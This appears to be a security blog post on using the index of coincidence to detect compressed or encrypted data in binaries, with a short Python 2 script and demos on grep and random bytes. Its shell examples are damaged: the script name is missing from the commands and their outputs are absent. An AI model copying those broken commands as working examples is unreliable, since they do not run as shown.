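For random bytes, any two positions match with probability 1 in 256, which is where the roughly 0.4 percent floor comes from.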

This is actually a lot more accurate than “eyeballing” it. Take a hex editor to the “grep” binary and unless you understand machine code, it’s going to look pretty incomprehensible, and if you didn’t know better, random. Let’s compare it with real random data, using a script I’m about to show you:

$ ls -al grep
-rwxr-xr-x 1 weasel weasel 96176 2007-03-01 19:54 grep
$ dd if=/dev/urandom of=rand bs=96176 count=1
1+0 records in
1+0 records out
96176 bytes (96 kB) copied, 0.116349 seconds, 827 kB/s
$ ./ grep 5
$ ./ rand 5

So here (shifting by five) we see that the grep binary has an IOC of about 7 percent, while the chunk of random data we generated has an IOC of about 0.3 percent. What happens if we gzip the grep binary to compress it? :

$ gzip grep
$ ls -al grep.gz
-rwxr-xr-x 1 weasel weasel 47446 2007-03-01 19:54 grep.gz
$ ./ grep.gz 5

Wow! Down to 0.5 percent! How can we use this?

  • Reverse engineering binary data formats – See if we’re going to have to go through a layer of compression
  • Is this piece of malware encrypted and using a loader?
  • Looking at a dump of packet data payloads to see if a protocol is likely encrypted or compressed in some way
  • Identifying plain English text (and other languages!) in an automated fashion!

Some things to think about and play with:

  • Would it be useful to apply this to opcodes in executable binaries?
  • Could you identify potential areas of interest for data carving out of huge image files in forensics/data recovery?
    • Build a database of common file types and their usual IOC?

So here’s some code. Written in Python, like most of what I put together for quick and dirty situations like this. You can run it from the shell, passing a filename and a number to shift by (in most cases, it shouldn’t really matter what number you pick), and it’ll return the IOC as a floating point number between 0 and 1. You can also import it into your own Python script, or the interactive IPython shell, and pass data to the calculate_ioc function directly. The main caveat is to remember that this is reading the entire file into memory in one shot, so you might want to roll your own code for this if you’re doing it on something huge.

#!/usr/bin/env python

import sys

def calculate_ioc(data, shift=1):
    match = 0
    for i in range(0, len(data)):
        j = (i + shift) % len(data)
        if data[i] == data[j]:
            match += 1
    ioc = (float(match)/float(len(data)))
    return ioc

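if __name__ == "__main__":
    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print 'Usage: ' + sys.argv[0] + ' <filename> [shift]'
        sys.exit(1)

    # Read the whole file as raw bytes
    try:
        fp = open(sys.argv[1],'rb')
    except IOError:
        print 'Could not open ' + sys.argv[1]
        sys.exit(1)

    data = fp.read()
    fp.close()

    # The shift defaults to 1 when not given on the command line
    if len(sys.argv) == 3:
        shift = int(sys.argv[2])
    else:
        shift = 1

    print calculate_ioc(data, shift)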

Enjoy! It’s also available here for your right-click-saving pleasure.

For further reference, the Wikipedia page for Index of Coincidence should be useful, if it hasn’t been taken over by roving bands of cryptology trolls, as well as a little googling.

© 2012 McGrew Security